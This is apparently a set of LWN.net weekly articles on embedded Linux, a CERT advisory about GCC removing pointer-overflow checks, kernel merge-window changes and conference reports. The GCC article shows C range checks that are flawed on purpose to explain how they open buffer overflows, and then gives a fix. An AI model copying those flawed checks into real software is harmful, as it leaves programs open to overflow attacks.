Unsurprisingly, per-unit royalties were not popular, with two-thirds of
respondents unwilling to pay them, but 60% were willing to pay for
development and support of embedded Linux, so it is not just the free-beer
aspect that is drawing companies to Linux.  The largest group (45%) gets its sources as a
free download from a community site like kernel.org or handhelds.org, with
18% getting them bundled with their hardware.  Only 11% said that cost was 
the greatest influence on their choice.


Legal threats are still on the minds of some, with copyright or patent 
concerns being considered a significant threat to roughly half of the
respondents.  SCO has fallen off the radar, with only 2.5% thinking that it
is still a threat.  "None of the above" was the big winner, presumably
meaning that there are no significant threats, at 40%.


Kingman finished with a request of the embedded community to let him know
what things should be covered in more depth and any additional areas they
wish to see covered.  He is looking for input on what the community wants
to talk about: "we want to be your website."


		GCC and pointer overflows


On April 4, CERT put out a
scary advisory about the GNU Compiler Collection (GCC).  This advisory
raises some interesting issues on when such advisories are appropriate,
what programmers must do to write secure code, and whether compilers should
perform optimizations which could open up security holes in poorly-written
code. 

In summary, the advisory states:


	Some versions of gcc may silently discard certain checks for
	overflow. Applications compiled with these versions of gcc may be
	vulnerable to buffer overflows. [...]
	
	Application developers and vendors of large codebases that cannot
	be audited for use of the defective length checks are urged to
	avoiding [sic] the use of gcc versions 4.2 and later.


This advisory has disappointed a number of GCC developers, who feel that
their project has been singled out in an unfair way.  But the core issue is
one that C programmers should be aware of, so a closer look is called for.

To understand this issue, consider the following code fragment:
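
A minimal sketch of the sort of fragment in question; the names BUFLEN, buffer_end, and len_in_range_naive() are illustrative assumptions, as is the buffer size:

```c
#include <stddef.h>

#define BUFLEN 64		/* illustrative size */

static char buffer[BUFLEN];

/*
 * Naive range check: returns 1 if len appears to fit within buffer and
 * 0 if it does not.  The pointer addition buffer + len is well defined
 * only while len <= BUFLEN.
 */
int len_in_range_naive(size_t len)
{
	char *buffer_end = buffer + BUFLEN;

	if (buffer + len >= buffer_end)
		return 0;	/* len is out of range */
	return 1;
}
```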


Here, the programmer is trying to ensure that len (which might
come from an untrusted source) fits within the range of buffer.
There is a problem, though, in that if len is very large, the
addition could cause an overflow, yielding a pointer value which is less
than buffer.  So a more diligent programmer might check for that case
by changing the code to read:
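
A sketch of what that extended check might look like; BUFLEN, buffer_end, and len_in_range_wrapcheck() are illustrative names, not taken from the advisory:

```c
#include <stddef.h>

#define BUFLEN 64		/* illustrative size */

static char buffer[BUFLEN];

/*
 * Range check with an added test for pointer wraparound.  The second
 * comparison is the one at issue: it can only be true after the pointer
 * addition has already overflowed.
 */
int len_in_range_wrapcheck(size_t len)
{
	char *buffer_end = buffer + BUFLEN;

	if (buffer + len >= buffer_end || buffer + len < buffer)
		return 0;	/* len is out of range */
	return 1;
}
```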


This code should catch all cases, ensuring that len is within
range.  There is only one little problem: recent versions of GCC will
optimize out the second test (returning the if statement to the
first form shown above), making overflows possible again.  So any code
which relies upon this kind of test may, in fact, become vulnerable to a
buffer overflow attack.

This behavior is allowed by the C standard, which states that, in a correct
program, pointer addition will not yield a pointer value outside of the
same object (or one element past its end).  So the compiler can assume that the test for
overflow is always false and may thus be eliminated from the expression.  It
turns out that GCC is not alone in taking advantage of this fact: some
research by GCC developers turned up other compilers (including PathScale,
xlC, LLVM, TI Code Composer Studio, and Microsoft Visual C++ 2005) which
perform the same optimization.  So it seems that the GCC developers have a
legitimate reason to be upset: CERT would appear to be telling people to
avoid their compiler in favor of others - which do exactly the same thing.

The right solution to the problem, of course, is to write code which
complies with the C standard.  In this case, rather than doing pointer
comparisons, the programmer should simply write something like:
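
One possible form of such a check, as a sketch with illustrative names (BUFLEN and len_in_range() are assumptions, not code from the advisory or from GCC):

```c
#include <stddef.h>

#define BUFLEN 64		/* illustrative size */

/*
 * Integer-only range check: returns 1 if len is a valid length for a
 * buffer of BUFLEN bytes, 0 otherwise.  No pointer arithmetic takes
 * place, so there is no overflow for the compiler to assume away.
 */
int len_in_range(size_t len)
{
	if (len >= BUFLEN)
		return 0;	/* len is out of range */
	return 1;
}
```

Because the comparison involves only unsigned integers, even the largest possible len is handled in a fully defined way; pointer arithmetic on the buffer can then be deferred until len is known to be valid.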


There can be no doubt, though, that incorrectly-written code exists.  So
the addition of this optimization to GCC 4.2 may cause that bad code to
open up a vulnerability which was not there before.  Given that, one might
question whether the optimization is worth it.  In response to a statement
(from CERT) that, in the interest of security, overflow tests should not be
optimized away, Florian Weimer said:


	I don't think this is reasonable.  If you use GCC and its C
	frontend, you want performance, not security.  After all, the real
	issue is not the missing comparison instruction, but the fact that
	this might lead to subsequent unwanted code execution.  There are C
	implementations that run more or less unmodified C code in an
	environment which can detect such misuse, but they come at a
	performance cost few are willing to pay.


Joe Buck added:


	Furthermore, there are a number of competitors to GCC.  These
	competitors do not advertise better security than GCC.  Instead
	they claim better performance (though such claims should be taken
	with a grain of salt).  To achieve high performance, it is
	necessary to take advantage of all of the opportunities for
	optimization that the C language standard permits.


It is clear that the GCC developers see their incentives as strongly
pushing toward more aggressive optimization.  That kind of optimization
often must assume that programs are written correctly; otherwise the
compiler is unable to remove code which, in a correctly-written
(standard-compliant) program, is unnecessary.  So the removal of pointer
overflow checks seems unlikely to go away, though it appears that some new warnings will be added to alert
programmers to potentially buggy code.  The compiler may not stop
programmers from shooting themselves in the foot, but it can often warn
them that it is about to happen.

		An LWN.net Distribution List update


It's that time of year again -- the time when we look at how the LWN Distributions List has changed over the past
year.  Last year's update can be found here.  At that time the list had 485 "active"
distributions, with an additional 58 listings in the Historical section.
This year the list has grown to 491 active distributions, while the
Historical section has shrunk to 56 listings.

We define a historical distribution as one that is no longer under
development, but we leave them on the list as long as there is still code
to be found.  As always, it can be a challenge separating the slow-paced
distributions from the historical ones.  There are, inevitably, some
projects that are still in the active part of the list that have not been
developed in years.  Occasionally historical projects come out with new
releases.  Distributions will be removed from the list if their website
times out repeatedly over a period of time, but that's not the end of it.
Entries are moved to an internal list, where they are rechecked a few more
times.  Sometimes projects come back and are re-added to the list.

In the last year every link on the list has been checked at least once.
Almost half the list has been checked again.  In addition to regular link
checking, new distributions are added and existing entries are updated with
new releases and other information.  We do our best to keep the list
up-to-date.  That said, if you know of distributions that should be added,
or removed, or changed in any way, just let us know.

Now it's time to say goodbye to the distributions that have been removed in
the last year, in no particular order:  Brutalware, Progeny Componentized
Linux, herbix, BeatrIX Linux, Deep-Water/Linux, distccKNOPPIX,
LinuxDefender Live!, LNX-BBC, Mandows, Mediainlinux, RunOnCD, RxLinux,
LinuxInstall.org, Turkix, XoL, Aleph ARMlinux, UltraLinux, epiOS, APAWS
Linux with Gallery, Linux for Windows 9X, Phat Linux, GNU/Linux
TerminalServer for Schools, BSLinux, CAEN Linux, FlightLinux, Laonux,
LibraNet GNU/Linux, Linux in a Pillbox (LIAP), Mastodon, Phlak, PHP
Solutions Live, Sentinix, slimlinux, Snootix, Tunix, uOS, Icepack Linux and
Think BlueLinux.

		ELC: Morton and Saxena on working with the kernel community


In many ways, Andrew Morton's keynote set the tone for this year's Embedded
Linux Conference (ELC) by describing the ways that embedded companies and
developers can work with the kernel community in a way that will be
"mutually beneficial".  Morton provided reasons, from a purely economic
standpoint, why it makes sense for companies to get their code into the
mainline kernel.  He also provided concrete suggestions on how to make that
happen.  The theme of the conference seemed to be "working with the
community" and Morton's speech provided an excellent example of how and why
to do just that.

 Conference organizer Tim Bird introduced the keynote as "the main
event" for ELC, noting that he often thought of Morton as "kind of
like the adult in the room" on linux-kernel.  Readers of that
mailing list tend to get the impression that there's more than one of him
around because of all that he does.  He also noted that it was surprising
to some that Morton has an embedded Linux background—from his work at
Digeo.  

Morton believes that embedded development is underrepresented in
kernel.org work relative to its economic importance.  This is
caused by a number of factors, not least the financial constraints under
which much embedded development is done.  An exceptional case is the chip
and board manufacturers who have a big interest in seeing Linux run well on
their hardware so that they can attract more customers.  But even those do not
contribute as much as he would like to see to kernel development.

 An effect of this underrepresentation is a risk that it will tilt
kernel development more toward the server and desktop.  The kernel team is
already accused of being server-centric, and there is some truth to that,
"but not as much as one might think".  Kernel hackers do care
about the desktop as well as embedded devices, but without an advocate for
embedded concerns, sometimes things get missed.  

Something Morton would like to see is 
a single full-time "embedded maintainer".  That person would serve as the
advocate for embedded concerns, ensuring that they didn't get overlooked in
the process.  An embedded maintainer could
make a significant impact for embedded development.

 Not all kernel contributions need to be code, he said.  There is a need
just to hear the problems that are being faced by the embedded community
along with lists of things that are missing.  "Senior, sophisticated
people" are needed to help prioritize the features that are being
considered as well.  Morton often finds out things he didn't know at
conferences, things that he should have known about much earlier: "That's
bad!" 

 Morton is trying to incite the embedded community to interact with the
kernel hackers more on linux-kernel.  He said that a great way to get the
attention of the team is to come onto the mailing list and make them look
bad.  Unfavorable comparisons to other systems or earlier 
kernels, for example, especially when backed up with numbers, are noticed
quickly.  He said that it is important to remember that the person
who makes the most noise gets the most attention.

 One of the areas that he is most concerned about is the practice of
"patch hoarding"—holding on to kernel changes as patches without
submitting them upstream to the kernel hackers.  It is hopefully only due
to a lack of resources, but he has heard that some are doing it to try and
gain a competitive advantage.  This is simply wrong, he said; companies
have a "moral if not legal obligation" to submit those
patches.  



Morton outlined many good reasons for getting code merged upstream.
The code will be better because of the review done by the kernel
hackers; once it is done, the maintenance cost falls to near zero as well.
He also touted the competitive advantage, noting that getting your code
merged means that you have won—competing proposals won't get
in. Being the first to merge a feature can make it easier on
yourself and harder on your competition.


There are downsides to getting your code upstream as well.  Most of
those stem from not getting code out there early enough for review.  The
kernel developers can ask for significant changes to the code especially
in the area of user space interfaces.  If a company already has lots of
code using the new feature and/or interface, it could be very disruptive;
"sorry, there's no real fix for that except getting your code out
early enough".

 Another downside that companies may run into is with competitors being
brought into the process.  Morton and other kernel hackers will try to find
others who might have a stake in a new feature to get them involved so that
everybody's needs are taken into account.  This can blunt the "win" of
getting your feature merged.  Some are also concerned that competitors will
get access to the code once it has been submitted; "tough luck" Morton
said, everything in the kernel is GPL.  

Morton had specific suggestions for choosing a kernel version to use for an
embedded project.  2.6.24 is not a lot better than 2.4.18 for embedded use,
but it has one important feature: the kernel team will be interested in
bugs in the current kernel.  He suggests starting with the current kernel,
upgrading it while development proceeds, freezing it only when it is time
to ship the product.


He also suggests that a company create an internal kernel team with one or
two people who are the interface to linux-kernel.  This will help with name
recognition on the mailing list, which will in turn get patches submitted
more attention.  Over time, by participating and reviewing others' code,
the interface people will build up "brownie points" that will allow them
to call in favors to get their code reviewed, or to help smooth the path
for inclusion.


The kernel.org developers appear to give free support, generally very good
support, Morton said, but it is not truly free.  Kernel
hackers do it as a "mutually beneficial transaction"; they don't do it to
make more money for your company, they do it to make the kernel better.
Morton is definitely a big part of that, inviting people to email him,
especially if "five minutes of my time can save months of yours".


The decision about when to merge a new feature is hard for some to
understand.  Many consider Linux a dictatorship, which is incorrect; it is
instead "a democracy that doesn't vote".  The merge decision
is made on the model of the "rule of law" with kernel hackers playing the
role of judges.  Unfortunately, there are few written rules.


Some of the factors that go into his decision about a particular feature
are its maintainability, whether there will be an ongoing maintenance team,
as well as the general usefulness of the feature.  Depending on the size of
the feature, an ongoing maintenance team can be the deciding factor.  It is
not so important for a driver, but a new architecture, for example, needs
ongoing maintenance that can only be done by people with knowledge of and
access to the hardware.

 MontaVista kernel hacker Deepak Saxena gave a presentation entitled
"Appropriate Community Practices: Social and Technical Advice" later in the
conference that mirrored many of Morton's points.  He showed some examples
of hardware vendors making bad decisions that got shot down by the kernel
developers, mostly because they didn't "release early and release often".
There is a dangerous attitude that "it's Linux, it's open source, I
can do anything I want" which is true, but won't get you far with
the community.

 Saxena has high regard for the benefits of working with the system:
if your competitor is active in the community, they are getting an
advantage that you aren't.  Like Morton, he believes that some
members of the development team need to get involved in kernel.org
activities. "The community is an extension of your team, your team is
an extension of the community."

 He also has specific advice for hardware vendors: avoid abstraction
layers, recognize that your hardware is not unique, and think beyond the
reference board implementation.  Generalizing your code so that others can
use it will make it much more acceptable, as will talking with the
developers responsible for the subsystems you are touching.  Abstraction
layers may be helpful for hardware vendors trying to support multiple
operating systems, but they make it difficult for the kernel hackers to
understand and maintain the code.  The kernel.org folks are not interested
in finding and fixing bugs in an abstraction layer.  

He also points out additional benefits of getting code merged.  Once it is
in the kernel, the company's team will no longer have to keep up with
kernel releases, updating their patches to follow the latest changes.  The
code will still need to be maintained, but day-to-day changes will be
handled by the kernel.org folks.  An additional benefit is that the code
will be enhanced by various efforts to automatically find bugs in mainline
kernel code with tools like lockdep. 


It is clear that the kernel hackers are making a big effort to not only get
code from the embedded folks, but also some of their expertise.  There are
various outreach efforts to try and get more people involved in the Linux
development process; these two talks are certainly a part of that.  By
making it clear that there are benefits to both parties, they hope to make
an argument that will reach up from engineering to management resulting in
a better kernel for all.


		The 2.6.26 merge window opens


That shiny new 2.6.25 kernel which was released on April 16 is now ancient
history; some 3500 changesets have been merged into the mainline git
repository since then.  Some of the most significant user-visible changes
include:


 New drivers for Korina (IDT rc32434) Ethernet MACs, 
     SuperH MX-G and SH-MobileR2 CPUs,
     Solution Engine SH7721 boards,
     ARM YL9200, Kwikbyte KB9260, Olimex SAM9-L9260, and emQbit ECB_AT91
     boards,
     Digi ns921x processors,
     the Nias Digital SMX crypto engines,
     AMCC PPC460EX evaluation boards,
     Emerson KSI8560 boards,
     Wind River SBC8641D boards,
     Logitech Rumblepad 2 force-feedback devices,
     Renesas SH7760 I2C controllers, and
     SuperH Mobile I2C controllers.


 The PCI subsystem now supports PCI Express Active State Power 
     Management, which can yield significant power savings on suitably
     equipped hardware.

 There is a new security= boot parameter which allows the
     specification of which security module to use if more than one are
     available. 

 Network address translation (NAT) is now supported for the SCTP,
     DCCP, and UDP-Lite protocols.  There is also netfilter connection
     tracking support for DCCP.

 The network stack can now negotiate selective acknowledgments and window
     scaling even when syncookies are in use.

 Another long series of network namespace patches has been merged,
     continuing the long process of making all networking code
     namespace-aware.

 Mesh networking support has been added to the mac80211 layer.  It is
     currently marked "broken," though, until various outstanding issues
     are fixed.

 4K stacks are now the default for the x86 architecture.  This change
     is controversial and could be reversed by the time the final release
     happens. 

 SELinux now supports "permissive types" which allow specific domains
     to run as if SELinux were not present in the system at all.

 A number of enhancements have been made to the realtime group
     scheduler, including multi-level groups, the ability to mix processes
     and groups (and have them compete against each other for CPU time),
     better SMP balancing, and more.

 Support for the running of SunOS and Solaris binaries has been
     removed; it has long been unmaintained and did not work well.

 The kernel now has support for read-only bind mounts, which provide a
     read-only view into an otherwise writable filesystem.  This feature
     (the implementation of which was more involved than one might think)
     is intended for use in containers and other situations where even
     processes running as root should not be able to modify certain
     filesystems. 


Changes visible to kernel developers include:


 At long last, support for the KGDB interactive debugger has been 
     added to the x86 architecture.  There is a DocBook document in the
     Documentation directory which provides an overview on how to use this
     new facility.

 Page attribute table (PAT) support is also (again, at long last)
     available for the x86 architecture.  PATs allow for fine-grained
     control of memory caching behavior with more flexibility than the
     older MTRR feature.  See Documentation/x86/pat.txt for more
     information. 

 Two new functions (inode_getsecid() and
     ipc_getsecid()), added to support security modules and the
     audit code, provide general access to security IDs associated with
     inodes and IPC objects.  A number of superblock-related LSM callbacks
     now take a struct path pointer instead of struct
     nameidata.  There is also a new set of hooks providing
     generic audit support in the security module framework.

 The now-unused ieee80211 software MAC layer has been removed; all of
     the drivers which needed it have been converted to mac80211.  Also
     removed are the sk98lin network driver (in favor of skge) and bcm43xx
     (replaced by b43 and b43legacy).

 The generic semaphores
     patch has been merged.  The semaphore code also has new
     down_killable() and down_timeout() functions.

 The ata_port_operations structure used by libata drivers now
     supports a simple sort of operation inheritance, making it easier to
     write drivers which are "almost like" existing code, but with small
     differences. 

 A new function (ns_to_ktime()) converts a time value in
     nanoseconds to ktime_t.

 The final users of struct class_device have been converted to
     use struct device instead.  If all goes well, the
     class_device structure will be removed later in the 2.6.26
     cycle. 

 Greg Kroah-Hartman is no longer the PCI subsystem maintainer, having
     passed that responsibility on to Jesse Barnes.

 The seq_file code now accepts a return value of SEQ_SKIP from
     the show() callback; that value causes any accumulated output
     from that call to be discarded.


Needless to say, this development series is still young and, as of this
writing, the merge window has over a week to run.  So there will be a lot
more code going into the mainline before the shape of 2.6.26 becomes clear.

		The Grumpy Editor encounters the Hardy Heron


Your editor is not always known for making life easy for himself.  Perhaps
one of the clearest examples of masochistic behavior would be a certain
preference for running development distributions on mission-critical
systems.  That said, your editor has stuck with a stable distribution on
his laptop through a round of intensive travel earlier this year.  But that
was too easy, so, shortly before heading off to the Linux Foundation's
Collaboration Summit, the laptop got moved to the Ubuntu "Hardy Heron"
distribution.  Needless to say, there have been some interesting ups and
downs (literally) since then.


There is always a certain thrill that comes with upgrading a system and finding that
important features no longer work.  In this case, the problem was suspend
and resume, which your editor uses heavily.  In fact, the system would
suspend just fine - as long as one failed to notice that, behind the
cleverly darkened screen, the laptop's backlight had been left on.
Needless to say, this new behavior is not helpful if one's goal is to save
power while the system is suspended, but it gets worse than that.  Your
editor discovered this nice surprise after carrying the computer in a
backpack for a few hours; by the time it came out, it was almost too hot to
hold.  Happily, no permanent damage appears to have been done.


Or, perhaps, unhappily.  Your editor has been looking for an excuse to
get a new laptop for a while.


The problem turned out to be a HAL configuration error combined with a
strange internal model number which makes your editor's Thinkpad X31
different from, seemingly, every other X31 on the planet.  Once your editor
found the bug report and attached a "me too" comment, the solution was
quick in coming.  On the net, one can find complaints that Ubuntu is
unresponsive to bug reports, but that was certainly not the experience
here. 


As an aside, it seems worth noting that life seems to have gotten more
complicated, with a lot more code wrapped around the kernel than there once
was.  The problematic configuration file was
/usr/share/hal/fdi/information/10freedesktop/20-video-quirk-pm-ibm.fdi
- not a place where your editor, who is not a HAL expert, would have
thought to look.  That, it seems, is the price of more capable hardware and
software, but sometimes your editor pines for the days when it seemed
possible to carry a full understanding of the system within a single brain.


GNOME developers are (perhaps unjustly in recent years) known for taking a
minimal approach to configuration options.  That can be irritating, but
just as annoying is their tendency to reset the options they do provide
over major updates.  Once suspend and resume work, your editor demands
something else of a laptop when traveling: absolute silence.  So the return
of beeps to gnome-terminal was not appreciated.  Those were easily silenced,
but the GNOME developers also saw fit to bring back the blinking cursor -
and they took away the configuration option which abolishes that
intolerable feature.


Your editor first ran into the unstoppable blink with Rawhide; a query to
the developers there turned up a quick answer.  It seems that the GNOME
developers have decided to create a single, system-wide parameter to
control blinking cursors.  Now, your editor approves of the concept of
being able to turn off that behavior everywhere with a single switch - but
only as long as that switch isn't hidden where nobody will ever find it.
In this case, the GNOME developers have taken this feature, wrapped it in
old newspapers, and stashed it behind the furnace in the basement; then
they put a trunk on top of it.  It is a
rare user who will find it unassisted.  In the hopes that it may save
one or two readers from some time spent with a search engine, your editor
will now divulge the top-secret incantation which turns blinking cursors
off:


Naturally, a terminal window is required to run this command.  It would
have been nice if the developers who packaged this code for Hardy Heron had
found a way to smooth over this change, but no such luck; as far as your
editor can tell, no distributor has made that effort.

Another bit of fun is that your editor is no longer able to set the desktop
background; the relevant configuration windows are ineffective.  In this
case, it would appear that the task of implementing the user's background
choices has been moved to nautilus - just the place your editor would have
thought to look for it.  As it happens, your editor has no use for file
managers and does not run nautilus - and is punished with an immutable
Ubuntu-brown background for that sin.  Happily, your editor still knows how
to run xsetroot.


All of the above is a set of relatively minor grumbles, all of which are
rectified in relatively short order.  Once those details have been taken
care of, the Hardy Heron release works quite well.  One of the biggest
aggravations from previous upgrades - having OpenOffice.org reformat the
slides in all of your editor's presentations - was not present this time
around.  Hopefully we are moving into an era where "it didn't mangle my
documents" is not something considered worthy of mention.


There was one very nice surprise as well.  Your editor's laptop previously
required almost 12 watts of power when running unplugged.  This laptop is
not at the bleeding edge of current technology, so the amount of time it
was able to run without a recharge has been dropping for a while.  With the
Hardy release, steady-state power consumption has dropped to just over
9 watts - a big improvement.  The credit for this change belongs to
developers at all levels: kernel, applications, distributors, etc.  The end
result is a system which runs much more efficiently, and that is a good
thing.


All told, your editor is reasonably content; this distribution looks
like one which might just be worth keeping around.  That's a good thing,
since Ubuntu plans to maintain it as a "long-term support" release.  Not
that your editor intends to make much use of that long-term support; there
should be a new development series starting soon, after all.  One of
the nice things about development distributions is that support
never ends as long as one stays on the treadmill and the project
itself remains alive.

		ELC: A taste of the conference


Technical conferences generally provide a wealth of choices, to the point
where participants have to make tough decisions at times to pick the session
to sit in on.  This year's Embedded Linux
Conference was no exception; there were multiple slots where the author
had to wish that he could be in more than one place at a time.  But he did
manage to take notes in some of those that he attended; hopefully some of the
conference flavor can come through in the following report.

Power management
 MontaVista's Kevin Hilman presented an approach for
handling power management on embedded devices that focused on changes that
can be made to the kernel, but noted that there is much that can be done by
applications too.  Because of
the time and money budgets available for embedded projects, many do not
have the resources to do a complete job of tuning the kernel to get the
best possible power performance.  There is also no "one size fits all" solution
for power management; there are too many device-specific issues to allow that.

 Hilman's approach is to target specific "building blocks" that embedded
developers can incorporate into their project.  Each block will provide
some savings, so the project can stop when the desired performance is
reached—or it is time to ship the device.  One of the easier steps is
to customize the idle loop in the kernel, putting the processor to sleep
when there is no work to be done.  There are different kinds of sleep,
though, generally trading off power savings and wakeup latency.  The
cpuidle subsystem provides a means to specify those values in an
architecture independent way, which, along with a platform independent
"governor", can put the processor into various sleep modes.  The only
platform-dependent pieces are the hooks to enter each of the different sleep
states.  
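To make the trade-off between power savings and wakeup latency concrete, a governor's choice can be sketched in a few lines of C.  This is only an illustration under stated assumptions: the structure, its field names, and the pick_sleep_state() helper are invented here and are not the cpuidle API.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical description of one sleep state; not the kernel's structure. */
struct sleep_state {
    const char *name;
    unsigned int exit_latency_us;   /* time needed to wake up again */
    unsigned int power_mw;          /* power drawn while in this state */
};

/*
 * Pick the lowest-power state whose wakeup latency fits within the
 * caller's limit.  Returns NULL if no state qualifies.
 */
static const struct sleep_state *
pick_sleep_state(const struct sleep_state *states, size_t n,
                 unsigned int latency_limit_us)
{
    const struct sleep_state *best = NULL;
    size_t i;

    assert(states != NULL || n == 0);
    for (i = 0; i < n; i++) {
        if (states[i].exit_latency_us > latency_limit_us)
            continue;               /* would take too long to wake up */
        if (best == NULL || states[i].power_mw < best->power_mw)
            best = &states[i];
    }
    return best;
}
```

In this sketch the table of states plays the role of the platform-specific part, while the selection loop is the platform-independent "governor".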

A similar approach is taken by the CPUfreq subsystem, which can reduce the
clock frequency of the CPU to reduce power consumption using the Dynamic
Voltage and Frequency Scaling (DVFS) feature of some processors.
"Operating points" (OPs)—voltage and frequency tuples—are defined for the
hardware.  There are
various generic CPUfreq governors that can then be used to determine when
to change OPs and which to change to.  The governor will invoke a
platform-specific driver to effect that change.  In addition, power
management "quality of service" is currently being discussed to allow
applications to request a certain level of performance that may override
some of the lower-level sleep or frequency decisions.

Embedded SELinux
 SELinux has a well-earned reputation for being able to restrict
processes to only use those resources that have been specifically allowed
by policy, but it is rather resource intensive.  Yuichi Nakamura presented
Hitachi's research into bringing SELinux into a more resource constrained
embedded environment.  One of the first problems they encountered was the
need for flash filesystems that support extended attributes (xattrs),
which is where SELinux stores labels for files.  Only jffs2 currently
supports xattrs, so that is the one they used.  

The next big hurdle was trying to get a set of policies that were stripped
down to the needs of an embedded platform.  Nakamura started with the
SELinux reference policy (refpolicy) and started removing rules.  The sheer
number of rules and policies that needed to be removed was
daunting—as was the need to understand what was being removed.
He also ran into strange dependencies: removing a sendmail policy caused a
problem in the apache rules.  The solution was to create a simplified
policy language and policy
editor that reduced the problem to something more tractable for the
embedded world.  In the process it greatly reduced the size of the policy
files, from 4.6M down to 60K.


Another problem encountered was the performance and size of
SELinux, which is a common embedded woe.  Through some hand optimization of
the read/write path, along with removing some unused permissions checks,
they were able to increase the performance by a factor of ten on their
SuperH reference platform.  By changing some static buffers in SELinux to a
dynamic allocation they also saved 250K of runtime memory.  Much of that
work was merged into 2.6.24.
There is still
work to be done, but with the changes, SELinux is viable for embedded
platforms. 

GCC and kernel hacking

Two sessions provided various tips and tricks for embedded development,
with Gene Sally of Timesys focused on GCC, while IBM's Hugh Blemings shared
some of the things he has learned from the kernel hackers he works with. 


Sally discussed the different ways that developers could get a GCC
toolchain for their target processor.  One of the bigger hurdles that an
embedded developer faces is getting a cross-compiler toolchain—one
that runs on his development workstation, but generates code for the target
platform.  There are several ways to get the toolchain: as a tarball for
popular development/target combinations, by using helper tools like crosstool or buildroot from uClibc, or by
building it from source directly.


Building from source is the most difficult, of course, but allows for the
most customizations and flexibility.  Sally went on to describe a handful
of useful GCC command-line options for helping to debug cross-compilers or
just to better understand what GCC is doing:

gcc -### - show what GCC would have executed
gcc -v - show what GCC is executing
gcc -g x.c -o x; objdump -S x - show the C and generated assembly code
gcc -E -dM - </dev/null - show all predefined GCC macros
gcc -C -E - show pre-processor output, but leave comments intact
gcc -M - show all include file dependencies (for use in Makefiles)
gcc -MM - like above, but ignore system include files


Blemings concentrated on the development infrastructure by describing the
lab that he used to port the kernel to a Taishan PowerPC-based evaluation
board.  When undertaking a project like that, "get to know your hardware
team" because they will have lots of important information and shortcuts
that can be used as part of the board "bringup".  At IBM in Canberra, where
Blemings is based, they have gotten to the point where they can bring up
Linux on any board where they can "access memory and point the PC [program
counter] at it"; his tips have come out of that environment.


One of the most important things is to realize that you will be building
kernels over and over again, so optimizing your environment for that will
save lots of time.  His suggestion was to start with a "honkin'" compile
box; he described an IBM multi-processor box as an excellent choice but noted
that the cost was so high he couldn't get one.  It would, however, do
"3k/sec", that is, compile three kernels per second.  In the absence of
something like that, he suggested borrowing cycles by using ccache and distcc to reduce and parallelize the
compilation that needs to be done.  Even adding relatively modest machines
into the distcc pool can significantly reduce time spent waiting for a new
kernel. 

Ubuntu mobile and embedded (UME) and Maemo

One of the hottest areas in embedded Linux these days is the mobile
internet device (MID) market.  There were two talks on MID-focused
distributions, with Canonical's David Mandala giving an overview of Ubuntu
Mobile and Embedded (UME) and Nokia's Kate Alhola talking about the status
and future directions of Maemo Mobile Linux.  UME is a relatively recent
addition to the mobile device space—they are anxiously awaiting
hardware to run on—whereas Maemo has been around for a while,
powering the Nokia N770, N800, and N810 internet tablets.


UME is an effort to apply the Ubuntu distribution and philosophy to
touchscreen devices.  Mandala explained that they are taking existing Linux
applications and adapting them for small screens that use fingers, rather
than keyboard and mouse, as the input device.  The resolution of the
displays is typically something approaching that of low-end desktops, but
the physical space they take up is far smaller (i.e. the dots per inch or
DPI is high) making it difficult to do development without actual hardware.


The UME project is working with Intel's Moblin.org project to target Atom processor
based systems.  It uses the Hildon
application framework atop GNOME
Mobile, running on an Ubuntu 8.04 (Hardy Heron) distribution.  Mandala
stressed that Linux should be "invisible" on these devices as users just
want applications that work to browse the web, use email, and the like.


The main focus of UME has, so far, been on the user interface, though power
consumption, memory footprint, and speeding up boot times are all on their
radar.  Canonical is very interested in fostering a community around UME,
but that has been "a bit of a challenge", mostly due to a lack of hardware
to run on.  Mandala expects a few different hardware devices to be
available "soon" and that will make it easier to attract a development
community. 


As should come as no surprise after Nokia's purchase of Trolltech early
this year, Alhola announced that Maemo would be supporting both GTK and 
Qt in the near future.  This is part of Nokia's belief that there is "no
single truth", so Maemo supports multiple paths to development on the
platform.  Maemo directly supports C, C++, and Python, while the community
has added support for Java, Objective C, Vala, and Mono. 


Nokia makes a very clear distinction in its product line between phones,
which are largely closed platforms, and tablets, which are open.  Open
source software is an essential part of their strategy as they want to
build an application ecosystem around their products. "We are taking open
source to the consumer mainstream," Alhola explains.


One of the interesting tools that Nokia is working on as part of Maemo is
Scratchbox, which is a toolkit
geared towards making cross-compilation easier.  It does this by making the
development environment look and act like the execution environment, using
QEMU to simulate the
target hardware.  Scratchbox supports both ARM and x86 targets, with
experimental support for additional architectures.  It uses standard
toolchains and distributions where possible and is released under the GPL.

LogFS

LogFS is a flash filesystem that is targeted at the larger flash devices
that are becoming more widespread.  Unlike some filesystems currently in
use, most notably jffs2, LogFS is specifically designed to avoid some of
the performance and scalability problems that come with larger
devices. Jörn Engel is the developer of LogFS, with some support from
the Consumer Electronics Linux Forum
(sponsor of ELC), so he gave an update on the status of the project.


Engel used an unconventional scale (the sucks/rules meter) to measure the
progress that had been made in the last year.  The scale runs from -10 to
10 and measures the "suckiness" of particular features
of the filesystem.  Taking a page from This Is Spinal Tap, the score for the
mount speed of LogFS was measured at 11 both last year and this.  It is
clearly the feature that Engel is most proud of as it takes 10-60ms to
mount a filesystem; a similarly sized jffs2 takes on the order of one second.


Engel looked at around ten separate attributes of the filesystem, first
rating them on where LogFS was a year ago, then re-rating based on where it
is today.  The conclusion is that the average measure has moved from -2.75
to -0.55, so that "on average, it hardly sucks".  He says he is getting
confident enough to submit it to Andrew Morton for inclusion in his tree,
hopefully on its way into the mainline.  Engel is clearly somewhat
frustrated with people who are waiting until it is "done" to start using
LogFS—though there are some fairly serious usability problems that
would tend to limit testers—proclaiming: "LogFS is finished, try
it now, today!"

In conclusion

There were more talks, of course, as well as an active "hallway track" for
the roughly 175 participants.  ELC is a well-run and very interesting
conference that is worth consideration for anyone who uses, or plans to
use, Linux as an embedded operating system.  This year's venue, the Computer History Museum, was
a nice facility for a conference of this size.  It also had some great
exhibits that will bring back memories for anyone who has been
using computers, calculators, or game systems over the past 50 years or
so—well worth a visit when one is in Silicon Valley.


		Integrating and Validating dynticks and Preemptable RCU


Introduction
Read-copy update (RCU) is a synchronization mechanism that was added to
the Linux kernel in October of 2002.
RCU is most frequently described as a replacement for reader-writer locking,
but it has also been used in a number of other ways.
RCU is notable in that RCU readers do not directly synchronize with
RCU updaters,
which makes RCU read paths extremely fast, and also
permits RCU readers to accomplish useful work even
when running concurrently with RCU updaters.

In early 2008, a preemptable variant of RCU was accepted into
mainline Linux in support of real-time workloads, a variant similar
to the RCU implementations in the -rt patchset since August 2005.
Preemptable RCU is needed for real-time workloads because older
RCU implementations disable preemption across RCU read-side
critical sections, resulting in excessive real-time latencies.

